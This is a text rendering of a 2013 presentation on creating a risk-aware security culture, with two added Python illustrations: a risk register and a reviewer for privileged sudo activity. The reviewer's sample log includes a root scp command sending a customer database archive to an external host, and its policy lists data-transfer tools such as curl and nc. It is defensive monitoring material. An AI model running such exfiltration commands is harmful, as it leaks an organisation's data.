Changing the Mindset: Creating a Risk Conscious and Security Aware Culture

Presented By:
John P. Pironti, CGEIT, CISA, CISM, CISSP, CRISC, ISSAP, ISSMP
President, IP Architects, LLC.

Hacker Hotshots
July 30, 2013

Copyright 2013 - IP Architects, LLC. - All Rights Reserved
  
Agenda

•  Using risk management to remove the fear of security
•  What is a Risk Aware and Security Conscious Culture?
•  Approaches to creating and changing culture
•  Final Thoughts
  
What is a Risk Conscious and Security Aware Culture?

•  Risk and security activities are business as usual considerations
   –  Embraced as a benefit to the business and not an obstacle to success
•  Threats and risks are accurately identified, anticipated, and managed
   –  Fear, Uncertainty and Doubt (FUD) no longer influences decisions or activities
•  Business leaders and stakeholders are empowered
   –  Able to make informed and business-appropriate risk management and security decisions
  
Benefits of a Risk Conscious and Security Aware Culture

•  Provides enhanced protection to information infrastructure and data assets
   –  Security is embraced instead of avoided
•  Creates a force multiplier
   –  Personnel actively assist in risk management and security activities
•  Security awareness empowers the organization
   –  Enables informed decision making
   –  Understand business benefits, expectations, and requirements
  
Using Risk Management to Remove the Fear of Security

•  Business leaders and stakeholders are typically afraid of or annoyed by security
   –  Often believe it will create obstacles that will prevent them from being successful
   –  Always being told what they cannot do by security
•  Risk management empowers business leaders and stakeholders to make appropriate decisions about security
   –  Stop telling them what you think they have to do
   –  Help them appreciate the risks associated with their options
  
Risk Management and Security vs. Security and Risk Management

•  Mind of the business person - “Security”
   –  Prevention, disablement, disempowerment
•  Mind of the business person - “Risk”
   –  Understanding, management, control, empowerment
•  Alignment with risk leads to greater acceptance than alignment with security
   –  Both terminology and approach
   –  Changing the mindset requires a risk first and security second approach
  
Change the Perception and Actions

•  Security professionals often use the word “Risk” when they mean “Threat and/or Vulnerability”
   –  Identify and quantify probabilities and impacts
•  Without current business intelligence risk cannot be accurately or properly calculated
   –  Strategy, financial, business priorities, etc.
•  Leading practices instead of best practices
   –  Only you know what is “best” for your environment
  
Business and Information Risk Profiles

•  Identify risk tolerances of business leaders and stakeholders
   –  Establish bounds of acceptable loss, compromise, distribution, or disablement for key business processes and assets
•  Information risk management and security should assist in their development
   –  Assists in cultivating awareness of the consultative approach
   –  Identify information threats and vulnerabilities and associated likelihoods and business impacts if realized
   –  Identify, develop, implement and maintain risk aligned control objectives in line with identified tolerances
•  Business leaders' view of Information Risk Management and Security (IRMS) will change
   –  Valuable information resource
   –  Protective and supporting function
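The two slides above make a point that is easy to state and easy to get wrong in practice: a threat acting on a vulnerability is not yet a risk figure until the business supplies the impact side (asset value) and the owner states a tolerance. The Python below is an added illustration of that workflow, not code from the presentation. The assets, threat/vulnerability pairs, annual rates of occurrence, exposure factors and tolerances are constructed, and the annualized loss expectancy formula (ALE = ARO × SLE, with SLE = asset value × exposure factor) is the standard quantitative model, which the slides do not name.

```python
"""Risk register: a threat/vulnerability pair becomes a risk figure only
once business impact and likelihood are both known, and is then compared
against the tolerance the asset owner set.  Added illustration; every
name and number below is constructed, not taken from the presentation."""
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass(frozen=True)
class Asset:
    name: str
    # Business value in currency units.  None means the business has not
    # supplied the figure yet, i.e. no "business intelligence" to work from.
    value: Optional[float]
    # Maximum annualised loss the asset owner is willing to accept.
    tolerance: float


@dataclass(frozen=True)
class Exposure:
    """One threat acting on one vulnerability of one asset."""
    asset: Asset
    threat: str
    vulnerability: str
    aro: float              # annual rate of occurrence (likelihood)
    exposure_factor: float  # fraction of asset value lost per occurrence


def annualised_loss(e: Exposure) -> Optional[float]:
    """ALE = ARO * SLE, where SLE = asset value * exposure factor.

    Returns None when the asset value is unknown: a threat and a
    vulnerability alone do not yield a risk number."""
    if e.asset.value is None:
        return None
    return e.aro * e.asset.value * e.exposure_factor


def evaluate(register: List[Exposure]) -> Dict[str, list]:
    """Sort exposures into three buckets: within tolerance, exceeding
    tolerance (a control objective is needed), and not computable
    (business input is needed before anyone argues about controls)."""
    result: Dict[str, list] = {"within": [], "exceeds": [], "unknown": []}
    for e in register:
        ale = annualised_loss(e)
        key = f"{e.asset.name}: {e.threat} via {e.vulnerability}"
        if ale is None:
            result["unknown"].append(key)
        elif ale > e.asset.tolerance:
            result["exceeds"].append((key, round(ale, 2), e.asset.tolerance))
        else:
            result["within"].append((key, round(ale, 2), e.asset.tolerance))
    return result


# Constructed sample register (assumption: not from the presentation).
CRM = Asset("customer database", value=2_000_000.0, tolerance=50_000.0)
WIKI = Asset("internal wiki", value=None, tolerance=5_000.0)

REGISTER = [
    Exposure(CRM, "phishing of admin", "no MFA on admin portal",
             aro=0.5, exposure_factor=0.10),
    Exposure(CRM, "ransomware", "unpatched file server",
             aro=0.2, exposure_factor=0.05),
    Exposure(WIKI, "credential stuffing", "password reuse",
             aro=1.0, exposure_factor=0.02),
]

if __name__ == "__main__":
    for bucket, items in evaluate(REGISTER).items():
        print(bucket, items)
```

Run as-is, the phishing exposure lands in `exceeds` (ALE 100,000 against a 50,000 tolerance), the ransomware exposure in `within` (ALE 20,000), and the wiki exposure in `unknown` because nobody has valued the asset. The third bucket is the practical payoff of the slide: the conversation with the wiki's owner is about their tolerance and the asset's value, not about which product to buy.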
  
Security by Compliance – Fear the Auditor More Than the Attacker

•  Compliance was always intended as the starting point, not the endgame
   –  Compliance requirements will always have to catch up to attackers and their capabilities
•  Audit and examination findings have a known business outcome and impact
   –  Security threats and vulnerabilities have probabilities and potentialities
•  Compliance provides business leaders and stakeholders a way to push back on FUD
   –  They believe that they are doing what can be reasonably expected of them
  
Policies and Standards First, Controls and Technology Second

•  Policies and standards define requirements and expectations
   –  Identify control objectives
   –  Approved by business leaders and stakeholders
•  Controls and technologies assist in meeting policy and standard requirements
   –  Technologies should not define control objectives or requirements
   –  Controls and technologies presented as requirements without supporting policies and standards are often considered optional or ignored
•  Proposed requirements and control objectives should be socialized to the affected audience in advance of policy development
   –  Identify areas of discomfort or discontent before developing policies and standards
  
Users – Your Greatest Asset and Most Challenging Adversaries

•  Many security professionals incorrectly assume users are the weakest link
   –  Users may unknowingly cause damage or harm
   –  Must be protected from themselves
•  User intuition can be a powerful control
   –  Both detective and preventative
   –  Technical controls are based on “yes” or “no”; the user knows “maybe”
•  User trust is key to cultural change
   –  Work with users, not against them
•  Privileged users can cause the most damage
   –  Business leaders are often unable or unwilling to accept that users may be working against them
  
Trust But Verify

•  Ideal way to protect both users and corporate assets
   –  Ensures users are not falsely accused
   –  Provides an effective oversight control for the corporation
•  Make sure users are made aware of the existence of monitoring
   –  Existence alone may prevent a malicious user from taking action
•  Privileged user activities are the most important to monitor
   –  Highest potential for material business impact
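The slide above asks for oversight of privileged activity that protects the user as much as the company: an audit trail that attributes each elevated command to a named person, so that routine work is visibly routine and only the exceptions need a conversation. The Python below is an added illustration of that review, not code from the presentation. The log lines are constructed in the standard sudo syslog format, and the review policy (business hours, the sensitive path list, the set of transfer tools) is an assumption chosen for the example.

```python
"""Privileged-activity review over a sudo-style audit log.  Added
illustration; the log lines and the policy below are constructed."""
import re
from collections import defaultdict
from typing import Dict, List

# Constructed sample lines in the syslog format sudo emits (assumption:
# these are not real captures).  The last line is a denied attempt.
SAMPLE_LOG = """\
Jul 30 09:12:01 db01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/systemctl restart postgresql
Jul 30 09:15:44 db01 sudo:      bob : TTY=pts/1 ; PWD=/home/bob ; USER=root ; COMMAND=/usr/bin/tar czf /tmp/cust.tgz /var/lib/postgresql
Jul 30 23:41:09 db01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/scp /tmp/cust.tgz ext@203.0.113.7:/in/
Jul 30 10:02:13 db01 sudo:    carol : TTY=pts/2 ; PWD=/home/carol ; USER=root ; COMMAND=/usr/bin/less /var/log/syslog
Jul 30 10:05:00 db01 sudo:     dave : user NOT in sudoers ; TTY=pts/1 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/passwd alice
"""

LINE_RE = re.compile(
    r"^(?P<month>\w{3}) +(?P<day>\d+) (?P<hh>\d\d):\d\d:\d\d (?P<host>\S+) sudo:\s+"
    r"(?P<user>\S+) : (?P<rest>.*)$"
)

# Review policy: all three are assumptions for this example, not from the slides.
BUSINESS_HOURS = range(8, 19)            # 08:00 to 18:59
SENSITIVE_PATHS = ("/var/lib/postgresql",)
TRANSFER_TOOLS = ("/usr/bin/scp", "/usr/bin/curl", "/usr/bin/nc")


def parse(log: str) -> List[Dict]:
    """Turn raw sudo records into dicts; non-sudo lines are skipped."""
    events = []
    for raw in log.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        # "key=value" fields are separated by " ; "; the denial marker has no "=".
        fields = dict(kv.split("=", 1) for kv in m["rest"].split(" ; ") if "=" in kv)
        events.append({
            "hour": int(m["hh"]),
            "user": m["user"],
            "target": fields.get("USER", ""),
            "command": fields.get("COMMAND", ""),
            "denied": "NOT in sudoers" in m["rest"],
        })
    return events


def review(events: List[Dict]) -> Dict[str, List[str]]:
    """Per-user findings.  Every user who appears gets an entry, so a
    reviewer can see routine activity (empty list) as well as exceptions;
    each exception carries the command and the reasons it was flagged."""
    findings: Dict[str, List[str]] = defaultdict(list)
    for e in events:
        user_findings = findings[e["user"]]   # creates the entry even when routine
        reasons = []
        if e["denied"]:
            reasons.append("privilege attempt by non-privileged user")
        if e["hour"] not in BUSINESS_HOURS:
            reasons.append("outside business hours")
        if any(p in e["command"] for p in SENSITIVE_PATHS):
            reasons.append("touches sensitive data path")
        if e["command"].split(" ")[0] in TRANSFER_TOOLS:
            reasons.append("data transfer tool as root")
        if reasons:
            user_findings.append(f"{e['command']} [{'; '.join(reasons)}]")
    return dict(findings)


if __name__ == "__main__":
    for user, items in sorted(review(parse(SAMPLE_LOG)).items()):
        print(user, items if items else "routine")
```

On the sample, carol's activity is routine and says so; bob's archive of the database directory and alice's late-night copy to an external host are each attributed to the account that ran them, with the reason attached; dave's denied attempt appears as an attempt, not as a completed action. That last distinction is what "not falsely accused" looks like in a log review.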
  
Embrace but Educate
Turning “No” Into “Yes”

•  Security is known for its ability to say “No”
   –  Drives covert behaviors and actions
•  Embrace but educate enables security to say “Yes” more often
   –  Ensures risks and expectations of security are understood
   –  Creates a positive perception of IRMS
   –  Reinforces the advisory and consultative approach
•  Use techniques that can be easily understood and internalized
   –  Simple language
   –  Case studies
   –  Examples
  
Personal Benefits Approach

•  Help individuals to help themselves
   –  Make them want to change their behaviors
   –  Change both personal and professional behaviors
•  Controls that restrict without context will drive covert behaviors
   –  Proactive education and personal benefit are a better and often cheaper control
   –  Education on safe social networking is an easy example to use to champion the approach
•  Users will embrace security if they understand the universal benefits
   –  Remove the perception of security as only a requirement of the business
   –  Assist users in deriving personal benefit and value from security knowledge and guidance
  
Final Thoughts

•  The culture of an organization ultimately determines its ability to protect itself
•  Creating a risk conscious and security aware culture is a journey, not a race
   –  Requires careful attention and constant reinforcement
   –  Ultimately provides the highest return on investment for protection of data assets and information infrastructure
•  Change in culture often results in the conversion of malicious attacks from incidents to anomalies
   –  Little to no material business impact
   –  The business will embrace the value of Information Risk Management and Security
  
Thank You for Your Time!

John P. Pironti, CGEIT, CISA, CISM, CISSP, CRISC, ISSAP, ISSMP
President, IP Architects, LLC.
jpironti@iparchitects.com
  
